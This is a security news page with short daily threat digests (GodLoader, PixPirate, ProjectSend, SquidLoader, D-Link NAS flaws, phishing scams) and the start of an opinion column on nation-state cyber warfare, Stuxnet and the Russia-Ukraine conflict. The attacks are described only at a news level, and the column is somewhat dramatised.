russia ukraine news

VIEH Daily Threat Analysis, 29 | November 2024

Hackers are rewriting the rules of game development with malicious intent. By embedding the GodLoader malware into assets of the popular Godot game engine, attackers have compromised over 17,000 systems globally. Disguised within GitHub repositories, the malware steals credentials, installs crypto miners, and targets developers and gamers alike. WhatsApp’s trust is being turned against its users. The PixPirate malware, which began in Brazil, now spans countries like India, Italy, and Mexico. Spreading through social engineering on YouTube and malicious WhatsApp messages, it manipulates contacts, creates spam groups, and exploits its victims’ trust in the messaging platform. Unpatched software remains an open door for cybercriminals. A critical authentication bypass flaw in ProjectSend is enabling attackers to upload webshells and remotely access servers. Despite the availability of a patch since May 2023, most instances remain vulnerable, highlighting the importance of timely updates. Top Malware Reported in the Last 24 Hours Hackers abuse Godot to deploy GodLoader Hackers utilized the GodLoader malware, taking advantage of the popular Godot game engine to infect over 17,000 systems across multiple platforms. By exploiting the engine’s flexibility and GDScript capabilities, they embedded harmful scripts in game asset files to execute malicious code. The malware enables theft of credentials and the download of additional payloads, including a crypto miner. The attackers utilized the Stargazers Ghost Network to distribute the malware through seemingly legitimate GitHub repositories, targeting developers and gamers. APT-C-60 targets Japan with SpyGrace South Korea-linked cyber-espionage group APT-C-60 conducted a cyberattack on an organization in Japan using a job application theme to deliver the SpyGlace backdoor. The attack employed legitimate services like Google Drive, Bitbucket, and StatCounter. A phishing email disguised as a job application was sent to the organization’s recruiting contact, which led to malware infection. The attack involved an RCE vulnerability in WPS Office, which initiated the infection chain through a file hosted on Google Drive. SpyGlace allowed the attackers to steal files and execute commands by connecting to a C2 server.  PixPirate resurfaces, spreads via WhatsApp The PixPirate malware, originally targeting financial services in Brazil, has evolved to spread through WhatsApp and now affects countries like India, Italy, and Mexico. It uses social engineering tactics on YouTube to trick users into installing it and then spreads through malicious WhatsApp messages. The malware hides itself on devices and exploits WhatsApp’s trust-based system to send and delete messages, manipulate contacts, and create spam groups.  Top Vulnerabilities Reported in the Last 24 Hours Microsoft re-releases Exchange updates Microsoft re-released the November 2024 security updates for Exchange Server after initially pulling them due to email delivery issues caused by custom mail flow rules. The re-released update, called Nov 2024 SUv2, resolves the mail delivery problems and provides more granular control over email headers. Admins are advised to install the re-released update and run the Exchange Health Checker script after installation. The update also adds detection and warnings for a high-severity Exchange Server vulnerability (CVE-2024-49040).  ProjectSend flaw under exploit Threat actors are actively exploiting a critical authentication bypass flaw (CVE-2024-11680) in ProjectSend, allowing them to upload webshells and gain remote access to servers. Despite a patch being available since May 16, 2023, the majority of ProjectSend instances (99%) remain vulnerable. Public exploits released in September 2024 have led to an increase in exploitation, with attackers altering system settings, enabling user registrations, and deploying webshells. It’s crucial for users to upgrade to ProjectSend version r1750 to mitigate the widespread attacks. Top Scams Reported in the Last 24 Hours “You’re Fired!” Beware of this new scam A new phishing campaign deceives people into thinking they have lost their jobs. It starts with an email that looks like a legal notice of termination. Cloudflare observed this attack targeting 14 customers, indicating a single actor behind it. One email subject, “Action Required: Tribunal Proceedings Against You,” threatens legal action and prompts users to click a link to download malware. This attack mainly targets Windows users, downloading harmful software, including a banking trojan, named Ponteiro, that steals credentials. Wanna be a hacker: Make it your profession: Click here Credit: Checkpoint, thehackersnews, securityintelligence, bleeping computer, the register, cyware

VIEH Daily Threat Analysis, 29 | November 2024 Read More »

VIEH Daily Threat Analysis | June 20, 2024

In the shadows of cyberspace, a devious malware loader is slinking through phishing campaigns to target Chinese organizations. Named SquidLoader, this threat can thwart both static and dynamic analysis, delivering secondary shellcode payloads with precision. Simultaneously, the cyber-espionage group UNC3886, linked to China, has been exploiting zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices, infiltrating targets across North America, Southeast Asia, and Oceania. Its sophisticated persistence mechanisms, including rootkits and backdoors, ensure prolonged access and surveillance.  Adding to the digital intrigue, ANSSI has sounded the alarm on Midnight Blizzard, a Russian state-sponsored hacker group, targeting the French Ministry of Foreign Affairs. Using compromised emails from governmental bodies, they attempted network infiltration via phishing campaigns.  Top Malware Reported in the Last 24 Hours New SquidLoader malware emerges  AT&T LevelBlue Labs discovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations. It uses various techniques to avoid detection and analysis while fetching second-stage shellcode payloads. Techniques include encrypted code segments, pointless unused code, Control Flow Graph obfuscation, debugger detection, and direct syscalls instead of Windows NT APIs. SquidLoader incorporates features designed to thwart static and dynamic analysis to evade detection.   Multiple attack chain deploys Fickle Stealer Fortinet spotted a new Rust-based malware called Fickle Stealer, targeting Microsoft Windows users. The attack chain consists of three stages: Delivery, Preparatory Work, and Packer and Stealer Payload. The delivery is done through a VBA dropper, VBA downloader, link downloader, and executable downloader. The preparatory work involves scripts that bypass User Account Control, create new tasks, and send messages to a Telegram bot. The Packer disguises Fickle Stealer as a legal executable to avoid static analysis. The Stealer Payload involves anti-analysis techniques and communicates with the server to send stolen information. Top Vulnerabilities Reported in the Last 24 Hours Chrome 126 update released Google released Chrome 126 to address six vulnerabilities, including a high-severity type confusion issue in the V8 script engine (CVE-2024-6100) that was reported by a researcher at the TyphoonPWN 2024 hacking competition. Google also addressed other high-severity flaws: an inappropriate implementation issue in WebAssembly (CVE-2024-6101), an out-of-bounds memory access in Dawn (CVE-2024-6102), and a use-after-free in Dawn (CVE-2024-6103). The tech giant has not shared technical details on the vulnerabilities, but confirmed they are not aware of any attacks exploiting them in the wild. Can anyone spoof Microsoft employee emails? A security researcher has discovered a bug that allows anyone to impersonate Microsoft corporate email accounts. This bug has not been patched yet, and Microsoft dismissed the initial report, claiming they couldn’t reproduce the issue. The bug only works when sending emails to Outlook accounts, which include a pool of at least 400 million users worldwide. The extent of any malicious exploitation of the bug is unknown. UNC3886 abuses 0-days in long-term espionage The China-linked cyber-espionage group UNC3886 has been using zero-day exploits to target Fortinet, Ivanti, and VMware devices, with a focus on entities in North America, Southeast Asia, and Oceania. The group has developed sophisticated persistence mechanisms and evasion tactics, including the use of rootkits and backdoors to maintain access and spy on victims for extended periods. The attackers have also leveraged trusted services like GitHub and Google Drive for C2 communications.  CISA published ICS advisory The CISA issued an advisory regarding a high-severity vulnerability in an outdated industrial switch made by RAD Data Communications. The vulnerability, identified as CVE-2019-6268, is a path traversal issue. It allows for unauthorized access to sensitive files, posing a risk to ICS and other OT systems. RAD SecFlow-2 has reached its end-of-life, prompting the vendor to recommend customers upgrade to a newer version. The federal agency provided general recommendations to reduce the risk of exploitation, as the impacted product is used worldwide in the communications sector. Top Scams Reported in the Last 24 Hours New Midnight Blizzard phishing campaign ANSSI warned that a Russian state-sponsored hacking group, Midnight Blizzard (aka Cozy Bear and APT29), targeted the French Ministry of Foreign Affairs using compromised emails of government staffers from the Foreign Ministry of Culture and the National Agency for Territorial Cohesion. The group attempted to infiltrate the networks using phishing campaigns, but ANSSI concluded that the hackers were unable to move laterally into government systems. The attacks align with Russian intelligence gathering operations, with phishing campaigns also targeting French embassies in Ukraine and Romania. Looking for internship: CLick here Content Credit: att, fortinet, security affairs, techcrunch, google. security week, Bank info security, cyware

VIEH Daily Threat Analysis | June 20, 2024 Read More »

Hacking Update 09/04/2024

End-f-Life (EOL) crisis hits again! D-Link advised retiring tens of thousands of internet-facing NAS devices as those would no longer receive security updates or vendor support. A security bug in these devices allows attackers to execute arbitrary commands and trigger denial of service. In another bug-related headline, Cisco fixed a critical vulnerability for its Catalyst 6000 Series Switches triggered by improper handling of process-switched traffic, potentially leading to denial of service. AI-themed fraud campaigns continue to proliferate as digital adversaries leverage ongoing technology trends. Most recently, victims were manipulated into joining fraudulent Facebook communities to download and access malicious executables posing as upcoming AI features and services. Top Malware Reported in the Last 24 Hours Malicious Facebook ads steal malware A cybercrime group was spotted promoting fake AI services like MidJourney, OpenAI’s SORA, and ChatGPT-5, tricking users into downloading password-stealing malware. They do it through Facebook ads and hijacked profiles impersonating popular AI services that promise previews of new features. Information-stealing malware like Rilide, Vidar, IceRAT, and Nova targeted victims’ browsers to steal credentials, cryptocurrency wallets, and other sensitive data. APT group launches malware campaign The Vedalia APT group deployed a new malware campaign leveraging oversized LNK files to bypass traditional security measures and compromise targeted systems. Broadcom recently highlighted this evolution in the group’s tactics, revealing how the use of large LNK files with double extensions and excessive whitespace obscures malicious command lines, making detection challenging. By executing PowerShell commands, the embedded script within these files aims to evade detection and deliver payloads like CL.Downloader!gen20 and trojans. Top Vulnerabilities Reported in the Last 24 Hours EOL D-Link NAS models pose threats A researcher, known as Netsecfish, disclosed a sensitive flaw, CVE-2024-3273, affecting multiple EOL D-Link NAS models, including DNS-340L, DNS-320L, DNS-327L, and DNS-325. The flaw enables arbitrary command injection and involves a hardcoded backdoor accessible via the nas_sharing.cgi uri. Exploitation could lead to unauthorized access, system configuration changes, or denial of service. Over 92,000 Internet-facing devices were found at risk. Cisco fixes high-severity issue in switches Cisco resolved a high-severity vulnerability, tracked as CVE-2024-20276, in Cisco IOS Software for Catalyst 6000 Series Switches. The flaw, triggered by improper handling of process-switched traffic, could allow an unauthenticated, local attacker to force a device to reload, leading to a DoS attack. Affected products include Catalyst 6500 and 6800 Series Switches with specific supervisor engines. Top Scams Reported in the Last 24 Hours Social media platforms exploited for phishing Threat actors were found abusing work-associated social media accounts in a new attack combining compromised accounts with a 2-step phishing scheme. Attackers used deceptive messages from compromised accounts to lure victims into clicking malicious links disguised as legitimate OneDrive documents, leading to account takeovers and credential theft. Threat groups, such as 3rr0r Hun73r, used this tactic aimed at stealing both personal and corporate data. Healthcare IT helpdesks targeted by social engineering hacks The HHS alerted the HPH sector about adversaries attempting to enroll their own devices in MFA through IT helpdesk assistance where they impersonate financial department employees. By using stolen ID verification details and feigning smartphone issues, they can gain access to corporate resources. According to experts, this modus operandi shares similarities with the Scattered Spider threat group, known for ransomware attacks on prominent organizations. Content Credit: Bleeping Computers, gb hackers, Security affairs, Cyware

Hacking Update 09/04/2024 Read More »

The real story behind Russia-Ukraine cyber wars

“Russian president is likely to use cyber attacks as a form of retaliation against our country for its action to counter Russias incursion in Ukraine.” – President of USA, Joe Biden at Business Roundtable quarterly meeting, March 2022 “In March 2022, hackers associated with Russian IP addresses have been scanning the network of 5 US energy companies and 18 US companies in other sectors like defence and financial services, hunting for zero day( still undiscovered ) vulnerabilities to execute disruptive and destructive cyber activity. “ – FBI “We will unleash full wrath of world hackers, key components of your Government (Russian)would be hijacked. Websites of Duma ,Ministry of Defence, State control tv R.com and of Russian stock exchange have already been taken down.” – Hacker collective, the Anonymous, sympathetic to Ukraine, March 2022 Welcome to the scary world of new age hybrid warfare where cyber attacks are sine-qua-non to any military exercise. Ever wondered what following hacker groups have in common? -FancyBear, SandWorm, Conti,Turla; all Russian and allegedly responsible for hacking Presidential elections in Ukraine and launching ‘NotPetya’ attacks causing mayhem on critical infrastructure of Ukraine. – Groups like Bureau 121, The Lazarus group owing allegiance to North Korea and allegedly responsible for 2016 Bangladesh National Bank cyber heist of more than USD 90 million, launching WannaCry worldwide ransomware attacks (for more information on WannaCry ransomware attacks kindly refer to the author‘s column dated February 24 2022), hack on Sony pictures in November 2014 for allegedly mocking supreme leader of North Korea wherein Lazarus hacker Park Jin Hyok was held responsible and put on FBI wanted list, though North Korea denies his existence. – Hacker groups IRGC(Islamic Revolutionary Guard Corps),owing allegiance to Iran and infamous for iconic cyber attacks against Aramco oil refinery in Saudi Arabia rendering more than 30,000 computers useless. – MI5, MI6, GCHQ(Government communication headquarter) of UK, capable of tapping data flowing through underground sea cables i.e. approximately 25% of global data. – Unit 8200 of Israel allegedly launched world‘s most sophisticated cyber-attack Stuxnet to stymie Iran‘s nuclear ambitions. – PLA unit 61486, APT 31, APT 41, StonePanda, RedEcho groups affiliated to China and as per report in New York Times, allegedly responsible for sensational power outage in Mumbai, a city of 20 million people, wherein trains were shut down and stock market closed, while hospitals had to switch to emergency power to keep ventilators running amid Covid outbreak. This happened while Chinese and Indian troops clashed in remote Galwan Valley, bashing each other to death with clubs and rocks. The common thread running through all the aforesaid hacker groups is that they are all allegedly ‘elite nation state actors’ : Hacker collectives churning out bespoke malware to attack critical infrastructure of adversary states. With the support of nation states, they launched cyber attacks with incredible sophistication to emaciate critical infrastructure like power plants, banking systems, nuclear plants, transportation systems of inimical regimes in order to ‘soften’ them before launching an all-out physical military campaign on the ground. They have also earned the moniker ‘Advanced Persistent Threat (APT) actors. Operation Olympic games It was early 2010, the furrows  on the brows of Israeli authorities and NSA officials of USA had deepened. Iran was behaving like a rogue state, it was rapidly developing nuclear offensive capabilities, masquerading them as civil nuclear energy facilities. It had stopped cooperating with International Atomic Energy Agency, IAEA and closed its nuclear fuel enrichment plants to inspection. Israel knew a nuclearised Iran would tilt the balance of power in the region and the very existence of tiny Jew state would be jeoparadised. Full-scale preparations had begun to modify missiles and  bomb Iran’s nuclear facilities. This could have spawned a massive war culminating into major loss of life. In spite of such massive risks, Israel knew that Iran has to be stopped for the sake of its own survival. Just in the nick of time, a Eureka moment dawned, when allegedly the technology advisor to Israel prime minister, in consultation with the chief scientist in NSA instead decided to launch operation Olympic games. An operation to design and deploy the world’s most sophisticated cyber weapon called Stuxnet(name derived from keywords in its code), without firing a bullet. Stuxnet discovered by scientist Serjey Ulasen and its propagation studied first by cyber security firm ‘VirusBlockAda’, was the most sophisticated piece of malware ever discovered and its effects ingenious and terrifying. It opened the Pandora’s box of the state actors’ executed cyber warfare. Stuxnet sabotaged Uranium nuclear fuel enrichment facility in Netanz, Iran, which was highly fortified and airgapped ,i.e. not connected to internet. The chief Nuclear Physicist of Pakistan, Dr AQ Khan, had sold the centrifuges for enrichment of uranium to Iran and their operation was studied meticulously by researchers in Mosad  and NSA. Accordingly, bespoke Stuxnet was curated. It is speculated that external contractors, overcame the air-gapping  by introducing Stuxnet via USB flash drive in Siemens’ Programmable Logic Controllers PLCs, which are small computers that control industrial automation in practically all sectors including airlines, power plants, water purification plants, nuclear plants etc. Cyber sabotage of PLCs can bring a whole nation down to its knees. This was the beginning of hybrid warfare and launch of the state of the art digital weapon, equipped with immense speed, precision and agility, sans any ground troops. Incredibly, in just a few minutes, zombie centrifuges started to spin at supersonic speeds, tearing themselves apart. Stuxnet’s baptism by fire, ensured for the first time, irreversible physical damage due to a cyber weapon leading to complete derailment of Iran‘s nuclear programme. Stuxnet proved to be Iran‘s nightmare, which gave a death blow and was the sole reason why Iran, till date, could not become an acclaimed nuclear weapon state. The story behind Russia Ukraine cyber wars -In 2014, Russia annexed Crimea, which was part of erstwhile Ukraine. It was followed by Russia backed insurgency in Eastern Ukraine, which has resulted in more than 20,000 deaths till date. The year marked

The real story behind Russia-Ukraine cyber wars Read More »